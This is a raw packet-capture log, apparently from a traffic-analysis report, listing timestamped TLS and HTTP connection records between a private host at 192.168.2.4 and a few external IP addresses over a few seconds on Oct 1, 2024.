                                                                                                                                                    Oct 1, 2024 06:26:29.824470997 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.824479103 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.824491024 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.824526072 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.824534893 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.824548006 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.824594021 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.827568054 CEST44349758162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.827630997 CEST49758443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.827636957 CEST44349758162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.827650070 CEST44349758162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.827689886 CEST49758443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.829118967 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.829137087 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.829201937 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.829206944 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.831510067 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.831531048 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.831648111 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.831648111 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.831657887 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.834287882 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.834305048 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.834352016 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.834357977 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.834420919 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.834733963 CEST49762443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.834748983 CEST44349762162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.845978022 CEST49778443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.846004963 CEST44349778162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.846101999 CEST49778443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.846901894 CEST49778443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.846916914 CEST44349778162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.847971916 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.847989082 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.848062038 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.848067999 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.848794937 CEST49758443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.848800898 CEST44349758162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.853072882 CEST49779443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.853096962 CEST44349779162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.853185892 CEST49779443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.853344917 CEST49779443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.853357077 CEST44349779162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.854259968 CEST49763443192.168.2.4184.28.90.27
                                                                                                                                                    Oct 1, 2024 06:26:29.854269981 CEST44349763184.28.90.27192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.854280949 CEST49763443192.168.2.4184.28.90.27
                                                                                                                                                    Oct 1, 2024 06:26:29.854285955 CEST44349763184.28.90.27192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.871557951 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.871579885 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.871643066 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.871656895 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.871726036 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.872014999 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.872033119 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.872083902 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.872091055 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.872117996 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.872807980 CEST80497663.33.243.145192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.872817993 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.872836113 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.872874975 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.872880936 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.872931004 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.873228073 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.873241901 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.873308897 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.873315096 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.873809099 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.873823881 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.873868942 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.873873949 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.873928070 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.874557972 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.874572992 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.874654055 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.874660969 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.876513958 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.934847116 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.934866905 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.934900045 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.934932947 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.934942007 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.934967995 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:29.934978962 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.935029984 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.948169947 CEST49761443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:29.948183060 CEST44349761162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.043669939 CEST4976680192.168.2.43.33.243.145
                                                                                                                                                    Oct 1, 2024 06:26:30.086009979 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.086308956 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.086318016 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.087240934 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.087328911 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.089056015 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.089112043 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.089344025 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.089350939 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.091583967 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.099445105 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.100603104 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.100631952 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.100892067 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.100996017 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.101002932 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.101469040 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.101479053 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.101532936 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.101596117 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.101902962 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.101970911 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.102152109 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.102225065 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.102619886 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.102682114 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.102781057 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.102790117 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.102879047 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.102884054 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.105232000 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.105300903 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.105571985 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.105654001 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.105686903 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.106720924 CEST49780443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.106761932 CEST44349780162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.106901884 CEST49780443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.107546091 CEST49780443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.107566118 CEST44349780162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.135920048 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.136284113 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.136347055 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.136770964 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.137092113 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.137191057 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.137363911 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.138456106 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.138907909 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.138919115 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.142033100 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.142474890 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.142493963 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.142879009 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.142973900 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.143286943 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.143418074 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.143548012 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.143595934 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.143671989 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.143975019 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.144047022 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.144120932 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.144151926 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.144826889 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.144862890 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.144921064 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.144922018 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.144968033 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.179429054 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.191890955 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.191901922 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.191941977 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.237510920 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.252599955 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.413435936 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413499117 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413537979 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413556099 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413594961 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413594007 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.413614988 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413640976 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413640976 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.413670063 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.413681984 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.413697004 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.416759014 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.416780949 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.416789055 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.416812897 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.416826010 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.416829109 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.416848898 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.416862011 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.416908979 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.416939020 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.417438984 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.417458057 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.417465925 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.417509079 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.417516947 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.417545080 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.417566061 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.417615891 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.417615891 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.417644978 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.418493032 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.418510914 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.418521881 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.418533087 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.418560028 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.418606043 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.418611050 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.418661118 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.430851936 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.430871964 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.430918932 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.430927992 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.430985928 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.432436943 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.432455063 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.432488918 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.432516098 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.432531118 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.432565928 CEST49771443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.432565928 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.432584047 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.434324980 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.434343100 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.434389114 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.434396982 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.434407949 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.434437037 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.434489965 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.436120987 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.436182976 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.440306902 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.440325975 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.440340042 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.440416098 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.440448999 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.440484047 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.440510988 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.444564104 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.444577932 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.444638968 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.444643021 CEST44349770162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446679115 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446724892 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446743965 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446762085 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446785927 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.446789980 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446810007 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446831942 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.446837902 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446858883 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.446862936 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.446894884 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.457979918 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.458029985 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.458050013 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.458093882 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.458296061 CEST49775443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.458311081 CEST44349775162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.462378979 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.462398052 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.462405920 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.462415934 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.462438107 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.462456942 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.462466955 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.462507010 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.462536097 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.469696045 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.469763994 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.469774961 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.471368074 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.471407890 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.471431971 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.471440077 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.471474886 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.471479893 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.471574068 CEST49767443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.471581936 CEST44349767162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.482748032 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.482764959 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.482817888 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.482841015 CEST44349772162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.482870102 CEST49772443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.485502005 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.485523939 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.485578060 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.485589027 CEST44349769162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.485657930 CEST49769443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.486969948 CEST49770443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.501769066 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.501789093 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.501816988 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.501842022 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.501852989 CEST44349768162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.501884937 CEST49768443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:30.503103971 CEST44349771162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:30.503124952 CEST44349771162.0.209.239192.168.2.4
